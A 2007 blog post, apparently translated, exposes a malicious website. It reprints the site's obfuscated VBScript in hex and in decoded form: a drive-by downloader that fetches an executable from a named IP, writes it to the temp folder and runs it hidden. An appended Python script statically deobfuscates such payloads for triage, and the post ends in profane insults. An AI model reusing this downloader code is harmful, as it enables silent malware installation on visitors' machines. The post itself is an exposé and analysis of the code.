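Fucking this website!

Yesterday I wrote a post titled "A person can't be this shameless"; today I'm exposing its true face once more.

On the system it injects into Explorer.exe, and after that keeps connecting to 202.109.237.59/ku.htm

Looking closely at the site's code: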

script language="VBScript"
S="6F6E206572726F7220726573756D65206E6578740D0A6375726C3D22687474703A2F2F3230322E3130392E3233372E35392F62696E645F35303231312E657865220D0A666E616D65313D2262696E645F35303231312E657865220D0A536574206466203D"
S=S+"20646F63756D656E742E637265617465456C656D656E7428226F626A65637422290D0A64662E7365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D393833412D30304330344643"
S=S+"3239453336220D0A7374723D224D6963726F736F66742E584D4C48545450220D0A5365742078203D2064662E4372656174654F626A656374287374722C2222290D0A43313D2241646F220D0A43323D2264622E220D0A43333D22737472220D0A43343D22"
S=S+"65616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0A7365742053203D2064662E6372656174656F626A65637428737472352C2222290D0A532E74797065203D20310D0A737472363D22474554220D0A782E4F70656E20"
S=S+"737472362C206375726C2C2046616C73650D0A782E53656E640D0A73313D22536372697074220D0A73323D22696E672E220D0A73333D2246696C65220D0A73343D2253797374656D4F626A656374220D0A73303D73312B73322B73332B73340D0A736574"
S=S+"2046203D2064662E6372656174656F626A6563742873302C2222290D0A73657420746D70203D20462E4765745370656369616C466F6C6465722832290D0A666E616D65313D20462E4275696C645061746828746D702C666E616D6531290D0A532E6F7065"
S=S+"6E0D0A532E777269746520782E726573706F6E7365426F64790D0A532E73617665746F66696C6520666E616D65312C320D0A532E636C6F73650D0A696620462E46696C6545786973747328666E616D6531293D74727565207468656E0D0A202020207365"
S=S+"742051203D2064662E6372656174656F626A65637428225368656C6C2E4170706C69636174696F6E222C2222290D0A20202020512E5368656C6C4578656375746520666E616D65312C22222C22222C226F70656E222C300D0A656E642069660D0A"
D=""
DO WHILE LEN(S)>1
k="&H"+LEFT(S,2)
p=CLng(k)
m=chr(p)
D=D&m
S=MID(S,3)
LOOP

With the part that executes it removed, the decoded result is:

on error resume next
curl="(masked to prevent accidental connection)202.109.237.59/bind_50211.exe"
fname1="bind_50211.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
C1="Ado"
C2="db."
C3="str"
C4="eam"
str1=C1&C2&C3&C4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, curl, False
x.Send
s1="Script"
s2="ing."
s3="File"
s4="SystemObject"
s0=s1+s2+s3+s4
set F = df.createobject(s0,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if F.FileExists(fname1)=true then
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
end if
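
The hex-decoding loop above can be reproduced statically, without a script host, to recover the second stage and fold the split strings (C1&C2&C3&C4) back into the component names they hide. This is an added example, not code from the original post; the function names are hypothetical and the sample input is constructed with a placeholder URL.

```python
import re

# The page's accumulation pattern: S="<hex>" followed by S=S+"<hex>"
FRAG = re.compile(r'^\s*S\s*=\s*(?:S\s*[+&]\s*)?"([0-9A-Fa-f]+)"\s*$', re.M)
ASSIGN = re.compile(r'^\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*$', re.I)
# Component names the decoded script on this page instantiates
WATCH = ("microsoft.xmlhttp", "adodb.stream", "scripting.filesystemobject",
         "shell.application", "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36")

def decode_hex_stage(page_text):
    """Static equivalent of the DO WHILE loop: two hex digits become one character."""
    blob = "".join(FRAG.findall(page_text))
    return bytes.fromhex(blob[: len(blob) // 2 * 2]).decode("latin-1")

def fold_strings(script):
    """Resolve variables built only from string literals joined by & or +."""
    env = {}
    for line in script.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        vals = []
        for p in re.findall(r'"[^"]*"|[^&+\s"]+', m.group(2)):
            if len(p) >= 2 and p[0] == p[-1] == '"':
                vals.append(p[1:-1])          # string literal
            elif p.lower() in env:
                vals.append(env[p.lower()])   # previously folded variable
            else:
                break                         # call or unknown name: not foldable
        else:
            env[m.group(1).lower()] = "".join(vals)
    return env

def triage(page_text):
    """Return download URLs and watched components found after deobfuscation."""
    script = decode_hex_stage(page_text)
    hay = (script + "\n" + "\n".join(fold_strings(script).values())).lower()
    return {"urls": sorted(set(re.findall(r'https?://[^\s"]+', script))),
            "components": [w for w in WATCH if w in hay]}

# Constructed sample (not the page's payload): same encoding and string splitting
_INNER = ('curl="http://payload.example.invalid/a.exe"\r\n'
          'C1="Ado"\r\nC2="db."\r\nC3="str"\r\nC4="eam"\r\n'
          'str1=C1&C2&C3&C4\r\nset S = df.createobject(str1,"")\r\n')
_HEX = _INNER.encode("latin-1").hex().upper()
SAMPLE = 'S="%s"\nS=S+"%s"\nD=""\n' % (_HEX[:80], _HEX[80:])

if __name__ == "__main__":
    print(triage(SAMPLE))
```
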

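After downloading bind_05211.exe, this piece of garbage is then used to run a whole pile of more garbage.

I don't know what scum like this are living for.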

posted @ 2007-04-05 13:59  Jeffers Yuan